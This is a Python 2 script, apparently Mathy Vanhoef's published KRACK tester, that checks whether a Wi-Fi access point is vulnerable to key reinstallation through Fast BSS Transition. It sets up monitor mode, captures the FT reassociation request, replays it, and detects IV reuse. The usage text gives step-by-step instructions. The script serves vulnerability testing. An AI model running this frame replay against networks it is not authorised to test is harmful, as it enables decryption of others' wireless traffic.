krack-ft-test.py 9.7 KB

123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899100101102103104105106107108109110111112113114115116117118119120121122123124125126127128129130131132133134135136137138139140141142143144145146147148149150151152153154155156157158159160161162163164165166167168169170171172173174175176177178179180181182183184185186187188189190191192193194195196197198199200201202203204205206207208209210211212213214215216217218219220221222223224225226227228229230231232233234235236237238239240241242243244245246247248249250251252253254255256257258259260261262263264265
  1. #!/usr/bin/env python2
  2. # Copyright (c) 2017, Mathy Vanhoef <Mathy.Vanhoef@cs.kuleuven.be>
  3. #
  4. # This code may be distributed under the terms of the BSD license.
  5. # See LICENSE for more details.
  6. import logging
  7. logging.getLogger("scapy.runtime").setLevel(logging.ERROR)
  8. from scapy.all import *
  9. from libwifi import *
  10. import sys, socket, struct, time, subprocess, atexit, select
  11. IEEE_TLV_TYPE_RSN = 48
  12. IEEE_TLV_TYPE_FT = 55
  13. IEEE80211_RADIOTAP_RATE = (1 << 2)
  14. IEEE80211_RADIOTAP_CHANNEL = (1 << 3)
  15. IEEE80211_RADIOTAP_TX_FLAGS = (1 << 15)
  16. IEEE80211_RADIOTAP_DATA_RETRIES = (1 << 17)
  17. #TODO: - Merge code with client tests to avoid code duplication (including some error handling)
  18. #TODO: - Option to use a secondary interface for injection + WARNING if a virtual interface is used + repeat advice to disable hardware encryption
  19. #TODO: - Test whether injection works on the virtual interface (send probe requests to nearby AP and wait for replies)
  20. # FIXME: We are repeating the "disable hw encryption" script to client tests
  21. USAGE = """{name} - Tool to test Key Reinstallation Attacks against an AP
  22. To test wheter an AP is vulnerable to a Key Reinstallation Attack against
  23. the Fast BSS Transition (FT) handshake, take the following steps:
  24. 1. The hardware encryption engine of some Wi-Fi NICs have bugs that interfere
  25. with our script. So disable hardware encryption by executing:
  26. ./disable-hwcrypto.sh
  27. This only needs to be done once. It's recommended to reboot after executing
  28. this script. After plugging in your Wi-Fi NIC, use `systool -vm ath9k_htc`
  29. or similar to confirm the nohwcript/.. param has been set. We tested this
  30. with an a TP-Link TL-WN722N and an Alfa AWUS051NH v2.
  31. 2. Create a wpa_supplicant configuration file that can be used to connect
  32. to the network. A basic example is:
  33. ctrl_interface=/var/run/wpa_supplicant
  34. network={{
  35. ssid="testnet"
  36. key_mgmt=FT-PSK
  37. psk="password"
  38. }}
  39. Note the use of "FT-PSK". Save it as network.conf or similar. For more
  40. info see https://w1.fi/cgit/hostap/plain/wpa_supplicant/wpa_supplicant.conf
  41. 3. Try to connect to the network using your platform's wpa_supplicant.
  42. This will likely require a command such as:
  43. sudo wpa_supplicant -D nl80211 -i wlan0 -c network.conf
  44. If this fails, either the AP does not support FT, or you provided the wrong
  45. network configuration options in step 1.
  46. 4. Use this script as a wrapper over the previous wpa_supplicant command:
  47. sudo {name} wpa_supplicant -D nl80211 -i wlan0 -c network.conf
  48. This will execute the wpa_supplicant command using the provided parameters,
  49. and will add a virtual monitor interface that will perform attack tests.
  50. 5. Use wpa_cli to roam to a different AP of the same network. For example:
  51. sudo wpa_cli -i wlan0
  52. > status
  53. bssid=c4:e9:84:db:fb:7b
  54. ssid=testnet
  55. ...
  56. > scan_results
  57. bssid / frequency / signal level / flags / ssid
  58. c4:e9:84:db:fb:7b 2412 -21 [WPA2-PSK+FT/PSK-CCMP][ESS] testnet
  59. c4:e9:84:1d:a5:bc 2412 -31 [WPA2-PSK+FT/PSK-CCMP][ESS] testnet
  60. ...
  61. > roam c4:e9:84:1d:a5:bc
  62. ...
  63. In this example we were connected to AP c4:e9:84:db:fb:7b of testnet (see
  64. status command). The scan_results command shows this network also has a
  65. second AP with MAC c4:e9:84:1d:a5:bc. We then roam to this second AP.
  66. 6. Generate traffic between the AP and client. For example:
  67. sudo arping -I wlan0 192.168.1.10
  68. 7. Now look at the output of {name} to see if the AP is vulnerable.
  69. 6a. First it should say "Detected FT reassociation frame". Then it will
  70. start replaying this frame to try the attack.
  71. 6b. The script shows which IVs (= packet numbers) the AP is using when
  72. sending data frames.
  73. 6c. Message "IV reuse detected (IV=X, seq=Y). AP is vulnerable!" means
  74. we confirmed it's vulnerable.
  75. !! Be sure to manually check network traces as well, to confirm this script
  76. !! is replaying the reassociation request properly, and to manually confirm
  77. !! whether there is IV (= packet number) reuse or not.
  78. Example output of vulnerable AP:
  79. [15:59:24] Replaying Reassociation Request
  80. [15:59:25] AP transmitted data using IV=1 (seq=0)
  81. [15:59:25] Replaying Reassociation Request
  82. [15:59:26] AP transmitted data using IV=1 (seq=0)
  83. [15:59:26] IV reuse detected (IV=1, seq=0). AP is vulnerable!
  84. Example output of patched AP (note that IVs are never reused):
  85. [16:00:49] Replaying Reassociation Request
  86. [16:00:49] AP transmitted data using IV=1 (seq=0)
  87. [16:00:50] AP transmitted data using IV=2 (seq=1)
  88. [16:00:50] Replaying Reassociation Request
  89. [16:00:51] AP transmitted data using IV=3 (seq=2)
  90. [16:00:51] Replaying Reassociation Request
  91. [16:00:52] AP transmitted data using IV=4 (seq=3)
  92. """
  93. #### Man-in-the-middle Code ####
  94. class KRAckAttackFt():
  95. def __init__(self, interface):
  96. self.nic_iface = interface
  97. self.nic_mon = interface + "mon"
  98. self.clientmac = scapy.arch.get_if_hwaddr(interface)
  99. self.sock = None
  100. self.wpasupp = None
  101. self.reset_client()
  102. def reset_client(self):
  103. self.reassoc = None
  104. self.ivs = IvCollection()
  105. self.next_replay = None
  106. def start_replay(self, p):
  107. assert Dot11ReassoReq in p
  108. self.reassoc = p
  109. self.next_replay = time.time() + 1
  110. def process_frame(self, p):
  111. # Detect whether hardware encryption is decrypting the frame, *and* removing the TKIP/CCMP
  112. # header of the (now decrypted) frame.
  113. # FIXME: Put this check in MitmSocket? We want to check this in client tests as well!
  114. if self.clientmac in [p.addr1, p.addr2] and Dot11WEP in p:
  115. # If the hardware adds/removes the TKIP/CCMP header, this is where the plaintext starts
  116. payload = str(p[Dot11WEP])
  117. # Check if it's indeed a common LCC/SNAP plaintext header of encrypted frames, and
  118. # *not* the header of a plaintext EAPOL handshake frame
  119. if payload.startswith("\xAA\xAA\x03\x00\x00\x00") and not payload.startswith("\xAA\xAA\x03\x00\x00\x00\x88\x8e"):
  120. log(ERROR, "ERROR: Virtual monitor interface doesn't seem to pass 802.11 encryption header to userland.")
  121. log(ERROR, " Try to disable hardware encryption, or use a 2nd interface for injection.", showtime=False)
  122. quit(1)
  123. # Client performing a (possible new) handshake
  124. if self.clientmac in [p.addr1, p.addr2] and Dot11Auth in p:
  125. self.reset_client()
  126. log(INFO, "Detected Authentication frame, clearing client state")
  127. elif p.addr2 == self.clientmac and Dot11ReassoReq in p:
  128. self.reset_client()
  129. if get_tlv_value(p, IEEE_TLV_TYPE_RSN) and get_tlv_value(p, IEEE_TLV_TYPE_FT):
  130. log(INFO, "Detected FT reassociation frame")
  131. self.start_replay(p)
  132. else:
  133. log(INFO, "Reassociation frame does not appear to be an FT one")
  134. elif p.addr2 == self.clientmac and Dot11AssoReq in p:
  135. log(INFO, "Detected normal association frame")
  136. self.reset_client()
  137. # Encrypted data sent to the client
  138. elif p.addr1 == self.clientmac and Dot11WEP in p:
  139. iv = dot11_get_iv(p)
  140. log(INFO, "AP transmitted data using IV=%d (seq=%d)" % (iv, dot11_get_seqnum(p)))
  141. if self.ivs.is_iv_reused(p):
  142. log(INFO, ("IV reuse detected (IV=%d, seq=%d). " +
  143. "AP is vulnerable!") % (iv, dot11_get_seqnum(p)), color="green")
  144. self.ivs.track_used_iv(p)
  145. def handle_rx(self):
  146. p = self.sock.recv()
  147. if p == None: return
  148. self.process_frame(p)
  149. def configure_interfaces(self):
  150. log(STATUS, "Note: disable Wi-Fi in your network manager so it doesn't interfere with this script")
  151. # 0. Some users may forget this otherwise
  152. subprocess.check_output(["rfkill", "unblock", "wifi"])
  153. # 1. Remove unused virtual interfaces to start from a clean state
  154. subprocess.call(["iw", self.nic_mon, "del"], stdout=subprocess.PIPE, stdin=subprocess.PIPE)
  155. # 2. Configure monitor mode on interfaces
  156. subprocess.check_output(["iw", self.nic_iface, "interface", "add", self.nic_mon, "type", "monitor"])
  157. # Some kernels (Debian jessie - 3.16.0-4-amd64) don't properly add the monitor interface. The following ugly
  158. # sequence of commands assures the virtual interface is properly registered as a 802.11 monitor interface.
  159. subprocess.check_output(["iw", self.nic_mon, "set", "type", "monitor"])
  160. time.sleep(0.5)
  161. subprocess.check_output(["iw", self.nic_mon, "set", "type", "monitor"])
  162. subprocess.check_output(["ifconfig", self.nic_mon, "up"])
  163. def run(self):
  164. self.configure_interfaces()
  165. self.sock = MitmSocket(type=ETH_P_ALL, iface=self.nic_mon)
  166. # Open the wpa_supplicant client that will connect to the network that will be tested
  167. self.wpasupp = subprocess.Popen(sys.argv[1:])
  168. # Monitor the virtual monitor interface of the client and perform the needed actions
  169. while True:
  170. sel = select.select([self.sock], [], [], 1)
  171. if self.sock in sel[0]: self.handle_rx()
  172. if self.reassoc and time.time() > self.next_replay:
  173. log(INFO, "Replaying Reassociation Request")
  174. self.sock.send(self.reassoc)
  175. self.next_replay = time.time() + 1
  176. def stop(self):
  177. log(STATUS, "Closing wpa_supplicant and cleaning up ...")
  178. if self.wpasupp:
  179. self.wpasupp.terminate()
  180. self.wpasupp.wait()
  181. if self.sock: self.sock.close()
  182. def cleanup():
  183. attack.stop()
  184. def argv_get_interface():
  185. for i in range(len(sys.argv)):
  186. if not sys.argv[i].startswith("-i"):
  187. continue
  188. if len(sys.argv[i]) > 2:
  189. return sys.argv[i][2:]
  190. else:
  191. return sys.argv[i + 1]
  192. return None
  193. if __name__ == "__main__":
  194. if len(sys.argv) <= 1 or "--help" in sys.argv or "-h" in sys.argv:
  195. print USAGE.format(name=sys.argv[0])
  196. quit(1)
  197. # TODO: Verify that we only accept CCMP?
  198. interface = argv_get_interface()
  199. if not interface:
  200. log(ERROR, "Failed to determine wireless interface. Specify one using the -i parameter.")
  201. quit(1)
  202. attack = KRAckAttackFt(interface)
  203. atexit.register(cleanup)
  204. attack.run()